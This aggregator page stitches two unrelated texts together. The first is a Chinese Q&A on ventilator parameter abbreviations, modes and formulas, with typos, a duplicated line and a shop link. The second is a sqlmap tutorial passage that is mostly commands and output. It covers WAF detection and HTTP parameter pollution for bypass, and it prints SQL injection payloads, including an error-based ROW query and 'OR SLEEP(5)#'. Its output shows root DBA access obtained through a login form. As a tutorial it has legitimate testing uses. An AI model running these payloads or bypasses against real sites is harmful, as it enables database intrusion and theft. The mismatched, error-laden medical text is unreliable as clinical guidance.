呼吸机参数简写
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了呼吸机参数简写相关的知识,希望对你有一定的参考价值。
VT Tinsp Pinsp PASB Ppeak Ppiat Pmean Vte Mv MVspn Trigger FcowAcc VTApnoer FApnoer
我只要这些简写的意思
dimensions
,weight,environmental,standards
compliance,electricl,model,pressure等等,另外可以咨询呼吸机4S店的工作人员,有个网站做得也很专业
www.cpap4s.com 参考技术A VT Tinsp Pinsp PASB Ppeak Ppiat Pmean Vte Mv MVspn Trigger FcowAcc VTApnoer FApnoer。。请翻译中文呀。。谢谢 参考技术B 一、呼吸机的作用及适应症:
1.作用:替代和改善外呼吸,降低呼吸(Respiratory)做功。(主要是改善通气功能,对改善换气功能能力有限)
2.适应症:呼吸功能不全、呼吸衰竭;呼吸肌肉和神经等不可逆损害的替代治疗;危重病人的呼吸支持;术中及术后病人等。
二、呼吸机的组成、驱动、原理:
1.组成部分:
(1)主机(ventilator):正压呼吸控制器、通气模式控制器、持续气流控制器、空氧混合器、压力感受器、流量感受器、呼气末正压发生器、触发装置、阀门系统、报警及监测装置等(由微电脑及电路等控制)。
(2)空气压缩机(compressor):中心供空气时不需要工作。
(3)外部管道系统:吸气管道(inspiratory tube)、气体加温湿化装置(humidifier)、呼气管道(expiratory tube)、集水杯。
2.驱动调节方式:
(1)电动电控:不需空气压缩机,驱动调节均由电源控制。
(2)气动气控:需空、氧气源,逻辑元件调节参数。
(3)气动电控:多数现代呼吸机的驱动调节方式。
3.工作原理:
(1)切换方式:吸气向呼气转换的方式。分为:时间、流速、压力、容量切换
(2)限制方式:吸气时气体运送的方式(吸气气流由什么来管理)。分为:流速、压力、容量限制(多数靠设置流速或压力)。
(3)触发方式:呼气向吸气转换的方式。分为:机器控制(时间触发)和病人触发(流量触发和压力触发)。
三、呼吸机的调试与监测:
1.呼吸机的检测:依呼吸机类型而定
2.控制部分:
(1)模式选择:依据病情需要
(2)参数调节:
①潮气量(Tidal Volume):8~15ml/kg ;定容:VT=Flow×Ti(三者设定两者); 定压:C=ΔV/ΔP(根据监测到的潮气量来设置吸气压力Inspirator Pressure)
②吸气时间:Ti=60/RR,一般吸呼比(I:E)为1:1.5~2;吸气停顿时间:属吸气时间,一般设置呼吸周期的10%秒(应〈20%)
③吸气流速:Peak Flow键;流速波形:递增、正弦波、方波、递减
④通气频率(RR):接近生理频率
⑤氧浓度(FiO2,21%~100%):只要PaO2/FiO2满意,FiO2应尽量低, FiO2高于60%为高浓度氧
⑥触发灵敏度:压力触发水平一般在基础压力下0.5~1.5cmH2O;流速触发水平一般在基础气流下1~3L/min
⑦呼气灵敏度(Esens):一般设置20~25%
⑧呼气末正压(PEEP):生理水平为3~5 cmH2O
⑨压力支持水平(Pressure Support):初始水平10~15 cmH2O
⑨压力支持水平(Pressure Support):初始水平10~15 cmH2O
⑩吸气上升时间百分比(Insp RiseTime%)、压力上升梯度、压力斜坡(Pressure Scope)、流速加速百分比
(2)其它特殊功能键:
①吸气暂停键(InspPause):吸气末阻断法测定气道平台压
②呼气暂停键(Exp Pause):呼气末阻断法测定auto PEEP
③手动呼吸键(Manual Breath、Manual Insp、Start Breath)
④氧雾化键(Nebulization)
⑤100% O2键
⑥叹气功能键(Sigh)
3.报警设置
(1)分钟通气量(minute ventilation,MV,VE)上(下)限:高(低)于设定或目标分钟通气量10~15%
(2)呼气潮气量上(下)限:高(低)于设定或目标潮气量10~15%
(3)气道压(airway pressure)上(下)限:高(低)于平均气道压5~10 cmH2O
(4)基线压(baseline pressure)上(下)限:PEEP值上(下)3 cmH2O
(5)通气频率上(下)限:机控时设定值上(下)5bpm,撤机时视情况而定。
(6)FiO2:设定值上下5~10%
4.呼吸机的监测系统(有些呼吸机有监测显示屏)
(1)数据监测:
(2)呼吸力学曲线监测:
①三条动态曲线:压力-时间(P-T)、容量-时间(V-T)、流速-时间(F-T)
②两个环:压力-容量环(P-V)、流速-容量环(F-V)
四、通气模式及方式简介:
1.常见通气模式简介:
(1)按压力或容量是否恒定分为:定压(如PC)、定容(如VC)
(2)按是否需要病人的触发分为: CMV(又称IPPV)、A/C
(3)按病人和呼吸机承担呼吸功的多少分为:
①完全通气支持:如CMV、 A/C、近正常呼吸频率的SIMV
②部分通气支持:如PSV、低频率的SIMV或+PSV、MMV、VSV、PAV、APRV、(BiPAP,有两种类型)、CPAP
(4)按指令方式分为:CMV、IMV、SIMV、MMV
(5)伺服-控制通气模式:Servo300A的PRVC、VSV、自动转换(automode);Bear1000的PA(又称VAPSV);‘伽利略’的ASV、APV
(6)撤机方法:T型管试验、SIMV/ IMV、PSV、SIMV+PSV、各种伺服-控制通气模式。
2.特殊通气方式简介:
(1)分隔肺通气(independent lung ventilation,ILV):两侧肺分别进行独立通气或一侧肺进行选择性通气,可用于气道隔离、双侧肺病变严重不对称、双侧急性肺损伤。
(2)反比通气(inverse tatio ventilation,IRV):可在较低气道峰压下改善气体交换,常用于ARDS。
(3)液体通气(liquid ventilation,LV):分全(total)液体通气(TLV)和部分(partial) 液体通气(PLV),液体用全氟化碳(perfluorocarbon,PFC)作为 O2和C O2的载体,有望成为治疗ARDS的有效方法。
(4)负压通气(negative pressure ventilation,NPV):将负压周期性作用于体表,使肺内压降低而产生通气,主要适应症为慢性进行性神经肌肉疾病。
(5)高频通气(high frequency ventilation,HFV):一种高频率(正常呼吸频率4倍以上)低潮气量(≤解剖死腔)的通气方式,降低肺损伤。分为高频正压通气(HFPPV),60~100bpm;高频喷射(jet)通气(HFJV),100~200bpm;高频振荡(oscillation)通气(HFOV),200~900bpm。
(6)无创性通气(noninvasive ventilation):如无创间隙正压通气(NIPPV);美国伟康公司的BiPAP呼吸机(模式有S、T、S/T、PC、CPAP)
(7)气管内吹气(tracheal gas insufflation,TGI):经气管插管放置细导管,减少死腔通气,增加肺泡通气,以便在呼气相冲淡解剖死腔中的CO2。
3.通气模式英文全称:
(1)CMV:持续控制通气,continuous mandatory ventilation
(2)IPPV:间隙正压通气,intermittent positive preassure ventilation
(3)A/CV:辅助/控制通气,assist-control ventilation
(4)PC:压力控制,preassure control
(5)VC:容量控制,volume control
(6)IMV:间隙指令通气,intermittent mandatory ventilation
(7)SIMV:同步间隙指令通气,synchronized intermittent mandatory ventilation
(8)PSV:压力支持通气,preassure support ventilation
(9)VSV:容量支持通气,volume support ventilation
(10)MMV:指令每分通气,mandatory minute ventilation
(11)PRVC:压力调节容量控制,preassure regulated volume control
(12)PAV:成比例辅助通气,proportional assist ventilation
(13)APRV:气道压力释放通气,airway preassure release ventilation
(14)VAPSV:容量保障压力支持通气,volume assured preassure support ventilation
(15)PA:压力扩增,preassure augmentation
(16)ASV:适应性支持通气,adaptive support ventilation
(17)APV:适应性压力通气,adaptive preassure ventilation
(18)BiPAP:双水平或双相气道正压,bilevel or biphasic positive airway preassure
(19)PEEP:呼气末正压,positive end-expiratory preassure
(20)CPAP:持续气道正压,continuous positive airway preassure
五、其它几种呼吸治疗措施简介:
1.特殊气体吸入:
(1)氦-氧混合气(Heliox):促进氧弥散及二氧化碳的排除,降低气道压和呼吸功耗。浓度:氦60%~79%,氧40%~21%。
(2)一氧化氮(NO):传递信息和调节血管张力,选择性肺血管扩张剂。
2.肺外气体交换:
(1)体外膜肺氧合(extracorporeal membrane oxygenation,ECMO):利用氧和膜进行血液和气体交换,使肺处于相对休息状态。
(2)血管内氧合器(intravascular oxygenator,IVOX):利用气体压力梯度差进行交换,全称为血管内氧合和二氧化碳排除装置(intravascular oxygenation and carbon dioxide transfer device)。
3.膈肌起搏:传递电流到膈神经使膈肌收缩
(1)体内膈肌起搏:(implanted diaphragm pacing,IDP)
(2)体外膈肌起搏:(external diaphragm pacing,EDP)
六、相关公式简介:
1.肺泡氧分压(PAO2)=(PB-47)*FiO2-1.25PaCO2(FiO2≥60%系数为1)
2.组织氧含量(CaO2)=1.34*Hb*SaO2+0.003* PaO2
3.氧摄取率(O2ER)= V O2/ D O2=(SaO2- SvO2)/ SaO2(正常值20%~30%)
组织氧摄取(VO2)=13.4*CO*Hb*(SaO2- SvO2);成人110~160ml/(min*m2)
组织氧运输(DO2)=13.4*CO*Hb*SaO2 成人520~570ml/(min*m2)
2.氧合指数(OI)=FiO2*Pmean*100/ PaO2(〈5%);PaO2 / FiO2也可表示氧合
3.肺内分流(Qs/QT)=(CcO2-CaO2)/(CcO2-CvO2)(〈10%)
估计公式(吸纯氧20min)Qs/QT=35%-(PaO2 /20)%
4.死腔与潮气量比(VD/VT)=(PaCO2-PECO2)/ PaCO2
正常值:自主呼吸时20%~40%;机械通气时40%~60%
5.气道峰压(PIP)=气道阻压(PRaw)+气道平台压(Ppla)=R*Flow+V/C+PEEP
平均气道压=(PIP-PEEP)*Ti/TOT*K+PEEP (恒压通气K=1;恒流通气K=1/2)
6.动态顺应性(Cdyn)=VT/(PIP-PEEP);静态顺应性(Cst)= VT /(Ppla -PEEP)
7.肺总量TLC=肺活量VC+残气量RV=深吸气量IC(补吸气量IRV+潮气量VT)+功能残气量FRC(补呼气量ERV+残气量)
8.压力换算关系:1cmH2O=0.098kPa;1mmHg=0.133 kPa;1kPa =0.145Psig;
1atm≈1bar≈100kpa本回答被提问者采纳
安全测试===sqlmap(肆)转载
十八、杂项
1.使用简写
参数:-z
有些参数组合是被经常用到的,如“--batch --random-agent --ignore-proxy --technique=BEU”,这样写一大串很不好看,在Sqlmap中,提供了一种简写的方式来缩短命令长度。
利用参数“-z”,每个参数都可以只写前几个字母,如“--batch”可以简写为“bat”。简写的原则是能够有所区别、对应的参数唯一就行。各个参数用逗号隔开。如:
python sqlmap.py --batch --random-agent --ignore-proxy --technique=BEU -u "www.target.com/vuln.php?id=1"
可以简写为:
python sqlmap.py -z "bat,randoma,ign,tec=BEU" -u "www.target.com/vuln.php?id=1"
再如:
python sqlmap.py --ignore-proxy --flush-session --technique=U --dump -D testdb -T users -u "www.target.com/vuln.php?id=1"
可以简写为:
python sqlmap.py -z "ign,flu,bat,tec=U,dump,D=testdb,T=users" -u "www.target.com/vuln.php?id=1"
2.在成功检测到注入点时报警
参数:--alert
该参数用于在找到新的注入点时发出警报,后跟一个用于发出警报的命令,如:
python sqlmap.py -r data.txt --alert "notify-send \'找到漏洞了\'"
部分输出如下:
[18:59:36] [INFO] GET parameter \'couno\' appears to be \'OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)\' injectable (with --not-string="001")
[18:59:36] [INFO] executing alerting shell command(s) (\'notify-send \'找到漏洞了\'\')
上例中用于发出警报的命令是Ubuntu中的notify-send命令。
3.设置问题的回答
参数:--answers
使用“--batch”以非交互模式运行时所有问题都以按默认值作为回答。有时不想以默认值为答案又想使用非交互模式,此时可以使用参数“--answers”对特定问题进行回答,若回答多个问题,以逗号分隔。如:
python sqlmap.py -u "http://192.168.22.128/sqlmap/mysql/get_int.php?id=1"--technique=E --answers="extending=N" --batch
部分输出如下:
[xx:xx:56] [INFO] testing for SQL injection on GET parameter \'id\' heuristic (parsing) test showed that the back-end DBMS could be \'MySQL\'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
[xx:xx:56] [INFO] do you want to include all tests for \'MySQL\' extending provided level (1) and risk (1)? [Y/n] N
4.在成功检测到注入点时发出“嘟”声
参数:--beep
使用此参数可以在成功检测到注入点时发出“嘟”声。使用“-m”从日志文件中检测大量网站时该参数会格外有用。
5.清除Sqlmap创建的临时表和自定义函数
参数:--cleanup
强烈推荐在测试结束后使用此参数清除Sqlmap创建的临时表和自定义函数,Sqlmap会尽可能地清除数据库管理系统和文件系统上的入侵痕迹。
6.检查依赖
参数:--dependencies
Sqlmap的有些功能依赖第三方库,在用到时发现没有这些库会报错退出。使用此参数可以检查依赖的第三方库是否安装,如:
python sqlmap.py --dependencies
部分输出如下:
[*] starting at 19:16:05
[19:16:05] [WARNING] sqlmap requires \'python-kinterbasdb\' third-party library in order to directly connect to the DBMS \'Firebird\'. Download from http://kinterbasdb.sourceforge.net/
[19:16:05] [WARNING] sqlmap requires \'python-pymssql\' third-party library in order to directly connect to the DBMS \'Sybase\'. Download from https://github.com/pymssql/pymssql
[19:16:05] [WARNING] sqlmap requires \'python cx_Oracle\' third-party library in order to directly connect to the DBMS \'Oracle\'. Download from http://cx-oracle.sourceforge.net/
[19:16:05] [WARNING] sqlmap requires \'python-psycopg2\' third-party library in order to directly connect to the DBMS \'PostgreSQL\'. Download from http://initd.org/psycopg/
[19:16:05] [WARNING] sqlmap requires \'python ibm-db\' third-party library in order to directly connect to the DBMS \'IBM DB2\'. Download from https://github.com/ibmdb/python-ibmdb
[19:16:05] [WARNING] sqlmap requires \'python jaydebeapi & python-jpype\' third-party library in order to directly connect to the DBMS \'HSQLDB\'. Download from https://pypi.python.org/pypi/JayDeBeApi/ & http://jpype.sourceforge.net/
[19:16:05] [WARNING] sqlmap requires \'python ibm-db\' third-party library in order to directly connect to the DBMS \'Informix\'. Download from https://github.com/ibmdb/python-ibmdb
[19:16:05] [WARNING] sqlmap requires \'python-pyodbc\' third-party library in order to directly connect to the DBMS \'Microsoft Access\'. Download from https://github.com/mkleehammer/pyodbc
[19:16:05] [WARNING] sqlmap requires \'python-pymssql\' third-party library in order to directly connect to the DBMS \'Microsoft SQL Server\'. Download from https://github.com/pymssql/pymssql
[19:16:05] [WARNING] sqlmap requires \'python-impacket\' third-party library for out-of-band takeover feature. Download from http://code.google.com/p/impacket/
[19:16:05] [WARNING] sqlmap requires \'python-ntlm\' third-party library if you plan to attack a web application behind NTLM authentication. Download from http://code.google.com/p/python-ntlm/
[19:16:05] [WARNING] sqlmap requires \'websocket-client\' third-party library if you plan to attack a web application using WebSocket. Download from https://pypi.python.org/pypi/websocket-client/
[*] shutting down at 19:16:05
可以看到我缺少的主要是用于连接数据库的第三方库。
7.关闭彩色输出
参数:--disable-coloring
8.指定使用Google dork结果的某页
参数:--gpage
使用参数“-g”时默认默认选择Google dork结果的前100条做注入测试。结合使用此参数,可以指定使用Google dork结果的某页。
9.使用HTTP参数污染
参数:--hpp
HTTP参数污染是绕过WAF/IPS/IDS的一种技术,详情见此处。这一技术针对ASP/IIS和ASP.NET/IIS平台尤其有效。如果怀疑目标受WAF/IPS/IDS保护,可以尝试用此参数进行绕过。
10.彻底检测WAF/IPS/IDS
参数:--identify-waf
Sqlmap可以识别WAF/IPS/IDS以便用户进行针对性操作(如:添加“--tamper”)。目前Sqlmap支持检测30多种不同的WAF/IPS/IDS,如Airlock和Barracuda WAF等。检测WAF的脚本可以在安装目录的waf目录中找到。
下例的目标是MySQL,受ModSecurity WAF保护:
python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?id=1" --identify-waf -v 3
部分输出如下:
[xx:xx:23] [INFO] testing connection to the target URL
[xx:xx:23] [INFO] heuristics detected web page charset \'ascii\'
[xx:xx:23] [INFO] using WAF scripts to detect backend WAF/IPS/IDS protection
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product \'USP Secure Entry Server (United Security Providers)\'[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product \'BinarySEC Web Application Firewall (BinarySEC)\'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product \'NetContinuum Web Application Firewall (NetContinuum/Barracuda Networks)\'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product \'Hyperguard Web Application Firewall (art of defence Inc.)\'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product \'Cisco ACE XML Gateway (Cisco Systems)\'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product \'TrafficShield (F5 Networks)\'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product \'Teros/Citrix Application Firewall Enterprise (Teros/Citrix Systems)\'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product \'KONA Security Solutions (Akamai Technologies)\'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product \'Incapsula Web Application Firewall (Incapsula/Imperva)\'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product \'CloudFlare Web Application Firewall (CloudFlare)\'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product \'Barracuda Web Application Firewall (Barracuda Networks)\'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product \'webApp.secure (webScurity)\'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product \'Proventia Web Application Security (IBM)\'
[xx:xx:23] [DEBUG] declared web page charset \'iso-8859-1\'
[xx:xx:23] [DEBUG] page not found (404)
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product \'KS-WAF (Knownsec)\'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product \'NetScaler (Citrix Systems)\'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product \'Jiasule Web Application Firewall (Jiasule)\'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product \'WebKnight Application Firewall (AQTRONIX)\'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product \'AppWall (Radware)\'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product \'ModSecurity: Open Source Web Application Firewall (Trustwave)\'
[xx:xx:23] [CRITICAL] WAF/IDS/IPS identified \'ModSecurity: Open Source Web Application Firewall (Trustwave)\'. Please consider usage of tamper scripts (option \'--tamper\')
参数:--skip-waf
默认地Sqlmap会发送虚假的SQL注入playload以试探目标是否有保护措施。如有任何问题,用户可以使用参数“--skip-waf”来禁用这一技术。
11.模仿智能手机
参数:--mobile
有些网站对智能手机和桌面环境的返回是不同的。当需要测试这种网站的智能手机页面时可以设置一个智能手机的User-Agent,或者更简单地,使用此参数,Sqlmap会在执行时询问要模仿成流行的手机中的哪种,如:
$ python sqlmap.py -u "http://www.target.com/vuln.php?id=1" --mobile
[...]
which smartphone do you want sqlmap to imitate through HTTP User-Agent header?
[1] Apple iPhone 4s (default)
[2] BlackBerry 9900
[3] Google Nexus 7
[4] HP iPAQ 6365
[5] HTC Sensation
[6] Nokia N97
[7] Samsung Galaxy S
> 1
[...]
12.离线模式(仅仅使用会话数据)
参数:--offline
添加此参数,Sqlmap将仅仅使用以前存储的会话数据做测试而不向目标发送任何数据包。
13.在Google dork中展示页面权重
参数:--page-rank
与参数“-g”一起使用,这会使Sqlmap向Google发起更多的请求并展示页面权重。
14.从输出目录中安全移除所有内容
参数:--purge-output
当用户想要安全地删除输出目录中的所有内容时使用此参数。所谓安全删除,不仅仅是删除,而是在删除前先用随机数据覆盖原有数据,甚至对文件名和目录名也进行重命名以覆盖旧名称,所有覆盖工作完成后才执行删除。最后,输出目录中会一无所有。如:
python sqlmap.py --purge-output -v 3
部分输出如下:
[*] starting at 19:51:36
[19:51:36] [DEBUG] cleaning up configuration parameters
[19:51:36] [INFO] purging content of directory \'/home/werner/.sqlmap/output\'...
[19:51:36] [DEBUG] changing file attributes
[19:51:36] [DEBUG] writing random data to files
[19:51:36] [DEBUG] truncating files
[19:51:36] [DEBUG] renaming filenames to random values
[19:51:36] [DEBUG] renaming directory names to random values
[19:51:36] [DEBUG] deleting the whole directory tree
[*] shutting down at 19:51:36
15.快速扫描
参数:--smart
当有大量URL要进行测试(如:“-m”),目的是尽快找出其中存在的某些注入点而有所遗漏也没有关系时可以使用“--smart”进行正向启发式扫描。此时只有让数据库管理系统报错的参数才会做进一步测试,其余URL均被跳过。如:
$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?ca=17&user=foo&id=1" --batch --smart
[...]
[xx:xx:14] [INFO] testing if GET parameter \'ca\' is dynamic
[xx:xx:14] [WARNING] GET parameter \'ca\' does not appear dynamic
[xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter \'ca\' might not be injectable
[xx:xx:14] [INFO] skipping GET parameter \'ca\'
[xx:xx:14] [INFO] testing if GET parameter \'user\' is dynamic
[xx:xx:14] [WARNING] GET parameter \'user\' does not appear dynamic
[xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter \'user\' might not be injectable
[xx:xx:14] [INFO] skipping GET parameter \'user\'
[xx:xx:14] [INFO] testing if GET parameter \'id\' is dynamic
[xx:xx:14] [INFO] confirming that GET parameter \'id\' is dynamic
[xx:xx:14] [INFO] GET parameter \'id\' is dynamic
[xx:xx:14] [WARNING] reflective value(s) found and filtering out
[xx:xx:14] [INFO] heuristic (basic) test shows that GET parameter \'id\' might be
injectable (possible DBMS: \'MySQL\')
[xx:xx:14] [INFO] testing for SQL injection on GET parameter \'id\' heuristic (parsing) test showed that the back-end DBMS could be \'MySQL\'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
do you want to include all tests for \'MySQL\' extending provided level (1) and risk (1)? [Y/n] Y
[xx:xx:14] [INFO] testing \'AND boolean-based blind - WHERE or HAVING clause\'
[xx:xx:14] [INFO] GET parameter \'id\' is \'AND boolean-based blind - WHERE or HAVING clause\' injectable
[xx:xx:14] [INFO] testing \'MySQL >= 5.0 AND error-based - WHERE or HAVING clause\'
[xx:xx:14] [INFO] GET parameter \'id\' is \'MySQL >= 5.0 AND error-based - WHERE or HAVING clause\' injectable
[xx:xx:14] [INFO] testing \'MySQL inline queries\'
[xx:xx:14] [INFO] testing \'MySQL > 5.0.11 stacked queries\'
[xx:xx:14] [INFO] testing \'MySQL < 5.0.12 stacked queries (heavy query)\'
[xx:xx:14] [INFO] testing \'MySQL > 5.0.11 AND time-based blind\'
[xx:xx:24] [INFO] GET parameter \'id\' is \'MySQL > 5.0.11 AND time-based blind\' injectable
[xx:xx:24] [INFO] testing \'MySQL UNION query (NULL) - 1 to 20 columns\'
[xx:xx:24] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found
[xx:xx:24] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[xx:xx:24] [INFO] target URL appears to have 3 columns in query
[xx:xx:24] [INFO] GET parameter \'id\' is \'MySQL UNION query (NULL) - 1 to 20 columns\' injectable
[...]
16.通过关键词使用或跳过payload
参数:--test-filter
若只想使用包含关键词“ROW”的payload可使用参数“--test-filter=ROW”。下面是以Mysql为目标的例子:
python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?id=1" --batch --test-filter=ROW
部分输出如下:
[xx:xx:39] [INFO] GET parameter ’id’ is dynamic
[xx:xx:39] [WARNING] reflective value(s) found and filtering out
[xx:xx:39] [INFO] heuristic (basic) test shows that GET parameter ’id’ might be injectable (possible DBMS: ’MySQL’)
[xx:xx:39] [INFO] testing for SQL injection on GET parameter ’id’
[xx:xx:39] [INFO] testing ’MySQL >= 4.1 AND error-based - WHERE or HAVING clause’
[xx:xx:39] [INFO] GET parameter ’id’ is ’MySQL >= 4.1 AND error-based - WHERE or HAVING clause’ injectable GET parameter ’id’ is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection points with a total of 3 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 4.1 AND error-based - WHERE or HAVING clause
Payload: id=1 AND ROW(4959,4971)>(SELECT COUNT(*),CONCAT(0x3a6d70623a,(SELECT (CASE WHEN (4959=4959) THEN 1 ELSE 0 END)),0x3a6b7a653a,FLOOR(RAND(0)*2))x FROM (SELECT 4706 UNION SELECT 3536 UNION SELECT 7442 UNION SELECT 3470)a GROUP BY x)
---
参数:--test-skip
若不想使用包含关键词“BENCHMARK”的payload可使用参数“--test-skip=BENCHMARK”。
17.交互式Sqlmap Shell
参数:--sqlmap-shell
使用此参数可以打开一个交互式的Sqlmap Shell,支持历史记录。如:
werner@Yasser:~$ sqlmap --sqlmap-shell
___
__H__
___ ___[.]_____ ___ ___ {1.1.10#stable}
|_ -| . ["] | .\'| . |
|___|_ [(]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
sqlmap-shell> -u "192.168.56.102"
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user\'s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 20:22:46
[20:22:46] [INFO] testing connection to the target URL
[20:22:46] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[20:22:46] [INFO] testing if the target URL is stable
[20:22:47] [INFO] target URL is stable
[20:22:47] [CRITICAL] no parameter(s) found for testing in the provided data (e.g. GET parameter \'id\' in \'www.site.com/index.php?id=1\')
[*] shutting down at 20:22:47
___
__H__
___ ___[.]_____ ___ ___ {1.1.10#stable}
|_ -| . ["] | .\'| . |
|___|_ [(]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
sqlmap-shell> exit
18.为初学者准备的简单向导
参数:--wizard
Sqlmap特地为初学者准备了一个有着尽可能少问题的工作流的向导。用户输入目标后若一直按回车选择默认回答到工作流的最后也会得到一个正确的结果。如:
werner@Yasser:~$ sqlmap --wizard
___
__H__
___ ___["]_____ ___ ___ {1.1.10#stable}
|_ -| . [)] | .\'| . |
|___|_ ["]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user\'s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 20:39:41
[20:39:41] [INFO] starting wizard interface
Please enter full target URL (-u): http://192.168.56.102/login.php
POST data (--data) [Enter for None]: username=001&password=003
Injection difficulty (--level/--risk). Please choose:
[1] Normal (default)
[2] Medium
[3] Hard
> 1
Enumeration (--banner/--current-user/etc). Please choose:
[1] Basic (default)
[2] Intermediate
[3] All
> 1
sqlmap is running, please wait..
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
Payload: username=001%\' OR NOT 2143=2143#&password=003
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind (comment)
Payload: username=001%\' OR SLEEP(5)#&password=003
---
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS operating system: Linux Ubuntu
back-end DBMS: MySQL >= 5.0.12
banner: \'5.5.50-0ubuntu0.14.04.1\'
current user: \'root@localhost\'
current database: \'DSSchool\'
current user is DBA: True
[*] shutting down at 20:40:07
总结
完整阅读Sqlmap官方手册后终于对Sqlmap有了一个较为全面的认识。以前只是有所耳闻,现在切实地感受到了Sqlmap的强大,也愈加敬佩Sqlmap的两位作者:
参考文献
以上是关于呼吸机参数简写的主要内容,如果未能解决你的问题,请参考以下文章